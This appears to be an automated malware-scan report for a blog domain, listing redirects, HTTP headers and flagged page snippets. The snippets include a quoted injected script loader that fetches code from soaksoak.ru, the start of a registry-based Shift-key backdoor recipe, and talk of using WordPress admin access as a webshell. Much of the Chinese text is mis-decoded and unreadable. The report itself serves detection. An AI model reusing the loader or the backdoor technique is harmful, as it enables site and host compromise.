Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=govsb.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: kino-mir.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 27 Feb 2015 17:22:12 GMT
Pragma: no-cache
Server: nginx/1.0.10
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=vcn3m0hotn4e3tourlshul7m94; path=/; domain=.kino-mir.com; HttpOnly
X-Powered-By: PHP/5.3.3-7+squeeze19
GET / HTTP/1.1
Host: kino-mir.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 27 Feb 2015 17:22:12 GMT
Pragma: no-cache
Server: nginx/1.0.10
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=vcn3m0hotn4e3tourlshul7m94; path=/; domain=.kino-mir.com; HttpOnly
X-Powered-By: PHP/5.3.3-7+squeeze19
Second query (visit from search engine):
GET / HTTP/1.1
Host: kino-mir.com
Referer: http://www.google.com/search?q=kino-mir.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: kino-mir.com
Referer: http://www.google.com/search?q=kino-mir.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Scanned pages/files
| Request | Server response | Status |
http://www.govsb.org/ | HTTP/1.1 302 Moved Temporarily Connection: close Date: Tue, 23 Dec 2014 15:52:59 GMT Location: http://www.lofter.com/mydomainr.do?domain=www.govsb.org&path=/ Server: nginx Content-Length: 154 Content-Type: text/html | clean |
http://www.lofter.com/mydomainr.do?domain=www.govsb.org&path=/ | HTTP/1.1 302 Moved Temporarily Connection: close Date: Tue, 23 Dec 2014 15:52:59 GMT Location: http://m0ore.lofter.com/?mydomainr=true Server: nginx Content-Length: 0 Content-Type: text/html;charset=UTF-8 P3P: policyref="/w3c/p3p.xml", CP="CUR ADM OUR NOR STA NID" Set-Cookie: NTESLOFTSI=E0E51A46E4E691A37881E61922837007.classa-lofter4-8010; Domain=.www.lofter.com; Path=/ Set-Cookie: firstentry=%2Fmydomainr.do%3FX-From-ISP%3D2%26domain%3Dwww.govsb.org%26path%3D%2F|; Domain=.lofter.com; Expires=Wed, 24-Dec-2014 15:52:59 GMT; Path=/ Set-Cookie: usertrack=c+5+hVSZj9siZk1tB2FsAg==; expires=Wed, 23-Dec-15 15:52:59 GMT; domain=lofter.com; path=/ | clean |
http://m0ore.lofter.com/?mydomainr=true | 200 OK Content-Length: 21641 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.govsb.org ...[333 bytes skipped]... t> <meta name="themename" content="115002"/> <meta http-equiv="content-type" content="text/html;charset=utf-8"/> <title>' SEVEN's Blog</title> <link rel="shortcut icon" href="http://imgsize.ph.126.net/?imgurl=http://imglf1.ph.126.net/2gfcH1GBQ6YljB9sJbuEFA==/640355572034086243.jpg_16x16x0x90.jpg"> <link rel="alternate" type="application/rss+xml" href="http://www.govsb.org/rss"> <meta name="Keywords" content="' SEVEN's Blog"/> <meta name="Description" content="' SEVEN's Blog - "/> <meta name="image:èæ¯å¾" content="http://img.ph.126.net/rTclvzONHLqnsv_VhYZXCQ==/6597086259330420791.jpg" /> <meta name="if:å¹³éºèæ¯" content=""/> <meta name="group1:" content="å 容宽度800px#å 容宽度500px|å 容宽度600px|å 容宽度700px|å 容宽度800px|å 容å ...[3530 bytes skipped]... Hidden iFrame found. style: hidden src: http://l.bst.126.net/rsc/htm/music.html <iframe style="display:none" src="http://l.bst.126.net/rsc/htm/music.html" > | ||
http://l.bst.126.net/rsc/js/pagelayer/pagelayer.js?0006 | 200 OK Content-Length: 26938 Content-Type: application/x-javascript | clean |
http://l.bst.126.net/rsc/js/jquery-1.6.2.min.js | 200 OK Content-Length: 91572 Content-Type: application/x-javascript | clean |
http://l.bst.126.net/rsc/js/themecommon.js?0010 | 200 OK Content-Length: 8555 Content-Type: application/x-javascript | clean |
http://analytics.163.com/ntes.js | 200 OK Content-Length: 19661 Content-Type: application/x-javascript | clean |
http://www.govsb.org/view | 200 OK Content-Length: 8178 Content-Type: text/html | clean |
http://l.bst.126.net/s/core.js?9a27d0d13da96c341d2db29b16553eb8 | 200 OK Content-Length: 85344 Content-Type: application/x-javascript | clean |
http://l.bst.126.net/s/pt_page_archive.js?8d858b2a15f391e7850cb78dee233a06 | 200 OK Content-Length: 77221 Content-Type: application/x-javascript | clean |
http://www.govsb.org/test404page.js | HTTP/1.1 302 Moved Temporarily Connection: close Date: Tue, 23 Dec 2014 15:53:18 GMT Location: http://www.lofter.com/mydomainr.do?domain=www.govsb.org&path=/test404page.js Server: nginx Content-Length: 154 Content-Type: text/html | clean |
http://www.lofter.com/mydomainr.do?domain=www.govsb.org&path=/test404page.js | HTTP/1.1 302 Moved Temporarily Connection: close Date: Tue, 23 Dec 2014 15:53:18 GMT Location: http://m0ore.lofter.com/test404page.js?mydomainr=true Server: nginx Content-Length: 0 Content-Type: text/html;charset=UTF-8 P3P: policyref="/w3c/p3p.xml", CP="CUR ADM OUR NOR STA NID" Set-Cookie: NTESLOFTSI=B5A0C94ED78B2DF340232F300050E3AE.classa-lofter1-8010; Domain=.www.lofter.com; Path=/ Set-Cookie: firstentry=%2Fmydomainr.do%3FX-From-ISP%3D2%26domain%3Dwww.govsb.org%26path%3D%2Ftest404page.js|; Domain=.lofter.com; Expires=Wed, 24-Dec-2014 15:53:18 GMT; Path=/ Set-Cookie: usertrack=c+5+hlSZj+6cMnhRDslBAg==; expires=Wed, 23-Dec-15 15:53:18 GMT; domain=lofter.com; path=/ | clean |
http://m0ore.lofter.com/test404page.js?mydomainr=true | 404 Not Found Content-Length: 5849 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.govsb.org ...[312 bytes skipped]... s?0006'></script> <meta name="themename" content="115002"/> <meta http-equiv="content-type" content="text/html;charset=utf-8"/> <title>页é¢ä¸åå¨</title> <link rel="shortcut icon" href="http://imgsize.ph.126.net/?imgurl=http://imglf1.ph.126.net/2gfcH1GBQ6YljB9sJbuEFA==/640355572034086243.jpg_16x16x0x90.jpg"> <link rel="alternate" type="application/rss+xml" href="http://www.govsb.org/rss"> <meta name="Keywords" content=""/> <meta name="Description" content=""/> <meta name="image:èæ¯å¾" content="http://img.ph.126.net/rTclvzONHLqnsv_VhYZXCQ==/6597086259330420791.jpg" /> <meta name="if:å¹³éºèæ¯" content=""/> <meta name="group1:" content="å 容宽度800px#å 容宽度500px|å 容宽度600px|å 容宽度700px|å 容宽度800px|å 容宽度900px|å 容宽度1000px"/> <meta name="color:è ...[3441 bytes skipped]... Hidden iFrame found. style: hidden src: http://l.bst.126.net/rsc/htm/music.html <iframe style="display:none" src="http://l.bst.126.net/rsc/htm/music.html" > | ||
http://l.bst.126.net/rsc/js/theme/r/pagephotoshow.min.js?0002 | 200 OK Content-Length: 54020 Content-Type: application/x-javascript | clean |
http://www.govsb.org/rss | 200 OK Content-Length: 34760 Content-Type: text/xml | suspicious |
Page code contains blacklisted domain: soaksoak.ru ...[2709 bytes skipped]... ent.toLowerCase();<br /> //if (ua.indexOf('chrome') != -1) return;<br /> var head=document.getElementsByTagName('head')[0];<br /> var script=document.createElement('script');<br /> script.type='text/javascript';<br /> script.src='http://soaksoak.ru/xteas/code';<br /> script.id='xxyyzz_petushok';<br /> head.appendChild(script);<br />}()<br />);'));</p> <p>æ¶æ代ç ä¸æ¦è¢«è§£å¯ï¼å°±ä¼å è½½soaksoak.ruååä¸çjsï¼hxxp://soaksoak.ru/xteas/code</p> <p><strong>æ£æµä¸é¢é²</strong></p> <p>ç®åå°ä¸æ¸ æ¥ç æ¯æ¯å¦ä½ææç½ç«çãå¦æä½ æ£å¨ä½¿ç¨WordPressï¼å ...[1174 bytes skipped]... | ||
http://www.govsb.org/post/1cc0164a_4ced1e6 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Tue, 23 Dec 2014 15:53:25 GMT Location: http://www.lofter.com/mydomainr.do?domain=www.govsb.org&path=/post/1cc0164a_4ced1e6 Server: nginx Content-Length: 154 Content-Type: text/html | clean |
http://www.lofter.com/mydomainr.do?domain=www.govsb.org&path=/post/1cc0164a_4ced1e6 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Tue, 23 Dec 2014 15:53:25 GMT Location: http://m0ore.lofter.com/post/1cc0164a_4ced1e6?mydomainr=true Server: nginx Content-Length: 0 Content-Type: text/html;charset=UTF-8 P3P: policyref="/w3c/p3p.xml", CP="CUR ADM OUR NOR STA NID" Set-Cookie: NTESLOFTSI=E3BF3CF5F0B9FD31F3C6A8B5370A378F.classa-lofter6-8010; Domain=.www.lofter.com; Path=/ Set-Cookie: firstentry=%2Fmydomainr.do%3FX-From-ISP%3D2%26domain%3Dwww.govsb.org%26path%3D%2Fpost%2F1cc0164a_4ced1e6|; Domain=.lofter.com; Expires=Wed, 24-Dec-2014 15:53:25 GMT; Path=/ Set-Cookie: usertrack=c+5+hVSZj/Udik1mB0o6Ag==; expires=Wed, 23-Dec-15 15:53:25 GMT; domain=lofter.com; path=/ | clean |
http://m0ore.lofter.com/post/1cc0164a_4ced1e6?mydomainr=true | 200 OK Content-Length: 10381 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.govsb.org ...[383 bytes skipped]... 2"/> <meta http-equiv="content-type" content="text/html;charset=utf-8"/> <title>ç»å¤§é¨åé ·æ´¾ï¼Coolpadï¼ææºæèåé¨-' SEVEN's Blog</title> <link rel="shortcut icon" href="http://imgsize.ph.126.net/?imgurl=http://imglf1.ph.126.net/2gfcH1GBQ6YljB9sJbuEFA==/640355572034086243.jpg_16x16x0x90.jpg"> <link rel="alternate" type="application/rss+xml" href="http://www.govsb.org/rss"> <meta name="Keywords" content=""/> <meta name="Description" content="ç½ç»å®å ¨å ¬å¸Palo Altoæ«é²ï¼é ·æ´¾å®å设å¤ä¸åå¨æéç¨æ·éç§æ°æ®çæ¶æåé¨ç¨åºãé ·æ´¾æ¯å½å ç¥åææºå¶é åï¼ä½ 常常ä¼å¨å宽带ãè¯è´¹å¥é¤éææºæ¶éå°å®ï¼ï¼äº§åè¿éå½å¤ãç 究人å认为ï¼é ·æ´¾å ¬å¸å¨ç产设å¤æ¶æ æå¨å ¶äº§åä¸è®¾ç½®äºåé¨ã ç»å¤§é¨åé ·æ´¾ææºåå¨åé¨ å¨ç§»å¨å®åç³»ç»ä¸ ...[3212 bytes skipped]... Hidden iFrame found. style: hidden src: http://l.bst.126.net/rsc/htm/music.html <iframe style="display:none" src="http://l.bst.126.net/rsc/htm/music.html" > | ||
http://m0ore.lofter.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 23 Dec 2014 15:53:27 GMT Location: http://www.govsb.org Server: nginx Content-Length: 0 Content-Type: text/html;charset=UTF-8 P3P: policyref="/w3c/p3p.xml", CP="CUR ADM OUR NOR STA NID" Set-Cookie: NTESLOFTSI=9E6FDAC380F6FE4EC9D9D21CE820AD43.classa-lofter7-8010; Domain=.www.lofter.com; Path=/ Set-Cookie: firstentry=%2Fblogindex.do%3FloftBlogName%3Dm0ore%26X-From-ISP%3D2|; Domain=.lofter.com; Expires=Wed, 24-Dec-2014 15:53:27 GMT; Path=/ Set-Cookie: usertrack=c+5+hVSZj/cazk1hB06yAg==; expires=Wed, 23-Dec-15 15:53:27 GMT; domain=lofter.com; path=/ | malicious |
http://www.govsb.org/post/1cc0164a_4cb66d3 | 200 OK Content-Length: 11087 Content-Type: text/html | suspicious |
Hidden iFrame found. style: hidden src: http://l.bst.126.net/rsc/htm/music.html <iframe style="display:none" src="http://l.bst.126.net/rsc/htm/music.html" > | ||
http://www.govsb.org/post/1cc0164a_4cb66a1 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Tue, 23 Dec 2014 15:53:30 GMT Location: http://www.lofter.com/mydomainr.do?domain=www.govsb.org&path=/post/1cc0164a_4cb66a1 Server: nginx Content-Length: 154 Content-Type: text/html | clean |
http://www.lofter.com/mydomainr.do?domain=www.govsb.org&path=/post/1cc0164a_4cb66a1 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Tue, 23 Dec 2014 15:53:30 GMT Location: http://m0ore.lofter.com/post/1cc0164a_4cb66a1?mydomainr=true Server: nginx Content-Length: 0 Content-Type: text/html;charset=UTF-8 P3P: policyref="/w3c/p3p.xml", CP="CUR ADM OUR NOR STA NID" Set-Cookie: NTESLOFTSI=A7B81ECEE40FF96D4027DD29F210316C.classa-lofter1-8010; Domain=.www.lofter.com; Path=/ Set-Cookie: firstentry=%2Fmydomainr.do%3FX-From-ISP%3D2%26domain%3Dwww.govsb.org%26path%3D%2Fpost%2F1cc0164a_4cb66a1|; Domain=.lofter.com; Expires=Wed, 24-Dec-2014 15:53:30 GMT; Path=/ Set-Cookie: usertrack=c+5+hVSZj/oZSE1dB1FzAg==; expires=Wed, 23-Dec-15 15:53:30 GMT; domain=lofter.com; path=/ | clean |
http://m0ore.lofter.com/post/1cc0164a_4cb66a1?mydomainr=true | 200 OK Content-Length: 12867 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.govsb.org ...[358 bytes skipped]... themename" content="115002"/> <meta http-equiv="content-type" content="text/html;charset=utf-8"/> <title>å¦ä½æ¿wordpressç«ç¹-' SEVEN's Blog</title> <link rel="shortcut icon" href="http://imgsize.ph.126.net/?imgurl=http://imglf1.ph.126.net/2gfcH1GBQ6YljB9sJbuEFA==/640355572034086243.jpg_16x16x0x90.jpg"> <link rel="alternate" type="application/rss+xml" href="http://www.govsb.org/rss"> <meta name="Keywords" content=""/> <meta name="Description" content="è¿æ¥å·²ä¹ çåºç¥æ.å¥½ä¹ å¥½ä¹ æ²¡åä¸è¥¿äº, ä¸æ¥æ²¡é¢æ, äºæ¥æ..ç°å¨æ£å·§æ个é¢æ, 就顺çæè·¯åä¸ä¸.å ç®ä»ä¸ä¸,ç°å¨wpç«ç¹æ»¡å°é½æ¯, è½ç¶é½æ¯ä¸ªäººå客, ä½å¯å©ç¨çå°æ¹å°±å¾å¤äº, èä¸æ主è¦çæ¯, è¿äºwpåå°å°±ç¸å½äºå¾å°äºwebshell!!1) å¾å¤å¤§ç«çç«é¿é½ä¼æ个个人å客, å¨éè¿æ°æ®åºæ¥å°å ¶å¯ç ...[3273 bytes skipped]... Hidden iFrame found. style: hidden src: http://l.bst.126.net/rsc/htm/music.html <iframe style="display:none" src="http://l.bst.126.net/rsc/htm/music.html" > | ||
http://www.govsb.org/post/1cc0164a_4cb6689 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Tue, 23 Dec 2014 15:53:32 GMT Location: http://www.lofter.com/mydomainr.do?domain=www.govsb.org&path=/post/1cc0164a_4cb6689 Server: nginx Content-Length: 154 Content-Type: text/html | clean |
http://www.lofter.com/mydomainr.do?domain=www.govsb.org&path=/post/1cc0164a_4cb6689 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Tue, 23 Dec 2014 15:53:33 GMT Location: http://m0ore.lofter.com/post/1cc0164a_4cb6689?mydomainr=true Server: nginx Content-Length: 0 Content-Type: text/html;charset=UTF-8 P3P: policyref="/w3c/p3p.xml", CP="CUR ADM OUR NOR STA NID" Set-Cookie: NTESLOFTSI=6F193A858EC324CCA989C0FB337BAF63.lofter19-8010; Domain=.www.lofter.com; Path=/ Set-Cookie: firstentry=%2Fmydomainr.do%3FX-From-ISP%3D2%26domain%3Dwww.govsb.org%26path%3D%2Fpost%2F1cc0164a_4cb6689|; Domain=.lofter.com; Expires=Wed, 24-Dec-2014 15:53:33 GMT; Path=/ Set-Cookie: usertrack=c+5+hVSZj/0dik1mB0rfAg==; expires=Wed, 23-Dec-15 15:53:33 GMT; domain=lofter.com; path=/ | clean |
http://m0ore.lofter.com/post/1cc0164a_4cb6689?mydomainr=true | 200 OK Content-Length: 8241 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.govsb.org ...[363 bytes skipped]... name" content="115002"/> <meta http-equiv="content-type" content="text/html;charset=utf-8"/> <title>æ·»å SHIFTåé¨åä¸æ¹æ³-' SEVEN's Blog</title> <link rel="shortcut icon" href="http://imgsize.ph.126.net/?imgurl=http://imglf1.ph.126.net/2gfcH1GBQ6YljB9sJbuEFA==/640355572034086243.jpg_16x16x0x90.jpg"> <link rel="alternate" type="application/rss+xml" href="http://www.govsb.org/rss"> <meta name="Keywords" content=""/> <meta name="Description" content="åå 天æäºå 个ç½ç«ï¼ä¹åæçç«ä¸è¬ä¸çåé¨ï¼å ¶å®åºæ¬çäºé½è¢«å é¤äºï¼è¿æ¬¡ä¸å³å¿è¦æ个shiftåé¨ççèªå·±ç¨çï¼ç§æç»ä½ ä»ç»ä¸ä¸ªæ¹æ³ï¼å°ä¸é¢ç代ç ä¿åæinfæ件[Version]Signature=$windowsNT$[DefaultInstall]AddReg=My_AddReg_Name[My_AddReg_Name]HKLM,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution options ...[3289 bytes skipped]... Hidden iFrame found. style: hidden src: http://l.bst.126.net/rsc/htm/music.html <iframe style="display:none" src="http://l.bst.126.net/rsc/htm/music.html" > | ||